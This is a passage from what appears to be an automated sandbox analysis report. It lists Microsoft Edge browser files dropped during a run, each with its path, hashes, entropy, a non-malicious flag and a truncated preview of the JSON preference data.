                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ce859424-043b-4372-be48-aa8ebc5fe96d.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10556
                                                                                                                                                                                  Entropy (8bit):5.143461600078083
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8pCr+bV+FqoVQWWrrvwUIDiJJxUHhPcYJ:st+SIKCs/13CDGSHCr+bGq2Q/rbwU2iK
                                                                                                                                                                                  MD5:C5FBFA7DD3FBCB17014E3314E294A606
                                                                                                                                                                                  SHA1:A0CFC710E14EE5349438974902527497C6FD7786
                                                                                                                                                                                  SHA-256:1B4415D6B29F99E3A9CB94EA8DD2F59BCECF2358929136ED89C5120FF2C58C06
                                                                                                                                                                                  SHA-512:373BE7A156ABEE346D7888148DE8F0B077A7E595E8E84F352AE32FFF37DD9CF1AE34933CF640C53EFE6205B0538A3FA2360B3D97DD9238C0339C447076DB3105
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d1405f36-3c91-4b63-b08d-b98b5d641efa.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14093
                                                                                                                                                                                  Entropy (8bit):5.238858716547755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGouSuQKCsF13CDaSLlHVb2VbGqxwPLm2UV0sDxNkYJSHj:sDOoVu13CXYbG3YNAD
                                                                                                                                                                                  MD5:E31BF74E9D1E24DB549B4B2AAF3B6093
                                                                                                                                                                                  SHA1:BF31992AF1C84AAB0B5D021AC0969E71F4A88BDD
                                                                                                                                                                                  SHA-256:CE10670C1E9DC27D7789CE9CDC16EBF4F6A2BC77B1A33FD68F2C7DF2B941B884
                                                                                                                                                                                  SHA-512:EECDDDC37B7F77E0139BCBCDB5E196AFEA8D2C9644161DC8A1B31DC39B8C9931E5D2C904A1F16587AE8D9B7B338619EE919E7EA581E1256025B2503E73EA17A3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d5b49f84-80df-451c-a560-cce3a6366fce.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11140
                                                                                                                                                                                  Entropy (8bit):5.17155437458015
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kwD3+M8RLpHVb2/bV+FqbtwOyL1y2UIs0sD74JxUHhPc8:st+SIKCs/13CDaSLlHVb2/bGqxwPLQ28
                                                                                                                                                                                  MD5:EAD07B1C9B305D5C351839F79CE19494
                                                                                                                                                                                  SHA1:0260C43219F4F1F36C90562A672C5CE2B3FE13C4
                                                                                                                                                                                  SHA-256:68F2B198D7AF0F8A1D4EDFA20DB756FF294E36862E5BFFAF8DC3C704EE802020
                                                                                                                                                                                  SHA-512:30A3BF15B21D423563039DE0B955EEE2D9412FCFCCD452BE9A68CEF292395FE1F7237EBDD7959344FE3BD8C8B517CA25690B226CA836FD6927AD9EE15991E37A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d79222dd-7791-47fa-97dc-7764730f2584.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):25186
                                                                                                                                                                                  Entropy (8bit):5.570608638730163
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjW2iW5w02f44i8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPaSIH0+OrwXtG5Wpw:VvmjjiWa02fniu1jalf/Ld+t/
                                                                                                                                                                                  MD5:DDB59C35000F95B6DC52BC66EB97858D
                                                                                                                                                                                  SHA1:5CBD2C3ABF5497B871BDC5E1305EEEE3442FCB1B
                                                                                                                                                                                  SHA-256:9248D7E6BD990EB13F3CF3A0C0C59276D51B840D163D600EAFB88C5700E08393
                                                                                                                                                                                  SHA-512:D2C24A61D7C9142EAA59F90CB11008EA961FC7CA983A6043D25A858901363641B90A710E898DC5415E5D9DC64FE29D72E409BE6436BE06B7CEA31F2287BC749E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\da998952-e36d-4d57-aade-cc0221f75695.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13993
                                                                                                                                                                                  Entropy (8bit):5.240014160950588
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGQSuQKCs/13CDaSLlHVb2/bGqxwPLQ2UV0sDpNkYJSHj:sDOXu33CXebG5sNAD
                                                                                                                                                                                  MD5:D06FC57D4252DE8FD00C2DECCA6F5FB6
                                                                                                                                                                                  SHA1:AA0C6913EB2E644DC84D29028FB6B086CFFC8536
                                                                                                                                                                                  SHA-256:806EC6788C491ADAADA2D82B15969BF2B55FD0C7647DFDFD4182AB4B7BA09820
                                                                                                                                                                                  SHA-512:687BE1B4140047631D68DB698EC71E5985873906256F9C1DE93BA1CBAD0508923520955D7536B89709254F39C877D5DC3030B72FED7ECE5E52D1A3C01358C580
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e8b42559-efea-46e1-aa23-131a3b747ee5.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                  Entropy (8bit):2.6612262562697895
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                  MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                  SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                  SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                  SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:117.0.2045.55

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3954c.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF395b9.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF395c9.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF398c6.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF398e6.TMP (copy)

                                                                                                                                                                                  Download File
